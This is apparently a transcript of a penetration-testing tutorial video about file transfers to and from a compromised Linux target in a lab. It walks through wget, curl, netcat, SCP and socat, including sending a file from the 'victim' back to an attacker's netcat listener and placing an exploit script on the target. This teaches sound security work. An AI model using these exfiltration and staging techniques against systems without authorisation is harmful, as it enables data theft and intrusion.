Hey, what's going on, fellas? Welcome back to the second part of file transfers galore, and in this video we're going to be concentrating on Linux file transfers. Here I have a low-level SSH shell against a Ubuntu target. As usual, we have two subterminals on Kali temp where we can spin up our servers and transfer our files. Generally speaking, it is easier to transfer files into Unix targets simply because a lot of tools that we can use for that purpose are already native in most Unix systems. So first, let's check what's available on our target machine. As we can see, there's a plethora of software that can be used to transfer files, including Wget, curl, socat, netcat, and so on. Now, it is very unlikely to find these many tools on a single target, but I just set up the environment this way for demonstration purposes. We're going to start with Wget. We can echo Wget test into a test1.txt. Into another tab, we can spin up a Python server on port 8000. And now from our target, what we can do is we can just type wget. Then we have our Kali IP, which is 192.168.12.136 on port 8000. We specify the file we want to grab, which is test1.txt. And here we go. We have 100%, and we also get a 200 hit on our Python server. To double check, we can cat our test1.txt, and we have this wget test. Awesome. So next up is going to be curl. We can echo a test, curling all the things. The syntax for curl is a little different. So with curl, unless you specify an out file, it is just going to redirect the file to standard out. And I'm going to demonstrate that in a second. You can see that here we have curling all the things. And we do get a hit. Or we can repeat the same command, but we can specify an out file with the O flag. So we can call that test2.txt. And here, as you can see, we have a complete file transfer. We can cat this test2.txt, curling all the things, and there you go. Now let's clear up this terminal. Now let's say that we need to reverse this process and we want to exfiltrate an important file from a target machine and back into our Kali attack box. So here we can, as a demonstration, we can create a doc file, and now we have to figure out a way on how to transfer it back to Kali. Here on Kali, we can start a netcat listener with netcat-l-p on port 444. And we can wait for an incoming file transfer. Back to our victim machine, we can push back this doc file, again using netcat. So we use netcat, we specify the Kali IP address on port quad 4. We call this doc.txt. As you can see here, the process hangs for a second, but trust me, it's done. So we can kill it first. And now, if we cat this doc, oops, I got the wrong terminal. So in here we can cat doc.txt, and this is an important doc, so here we have it. So the next tool is going to be SCP. So SCP is an acronym for Secure Copy. It is used primarily for copying files over an SSH connection. So if you have one, like in this case, and you have creds for the SSH connection of the target, you might want to use this technique. So here in temp, we can touch an exploit.py file, and there you go. Now, from Kali, we can type sudo scp exploit.py victim at the victim IP address, which is this 12.137 on TMP. And we have to authenticate twice, once for Kali, and the second one we have to authenticate with the credentials for the SSH connection, which is the one of the victim. And as you can see here, we have this exploit.py. Now let's clear up the terminal a little bit. The last tool we're going to test is socat. So socat is a command line based utility that establishes two bidirectional byte streams and allows to transfer data between these two. We can touch a socat.txt test file here. Now the syntax for socat might look a bit confusing at first, so bear with me for a second. We can do socat TCP for listen on port 443, fork file, and then we have a colon and socat.txt. So this one is going to be our listener. Now from our target, we can do socat TCP4. Then we have our Kali IP address, which is this 12.136 on port 443. File socat2.txt. I think I screwed up the syntax here, because I forgot to add a colon here, and this file is file colon socat2.txt. Also remember to rename the file you want to transfer, so it cannot be socat.txt, but it should be socat2.txt. Create. Once we fire it off, we have this socat.2.txt, and done. So to recap at this point, these are the Linux-specific tools we have tested today. Hope you guys have enjoyed the video, and as always, let me know what you think down below in the comment section. Bye.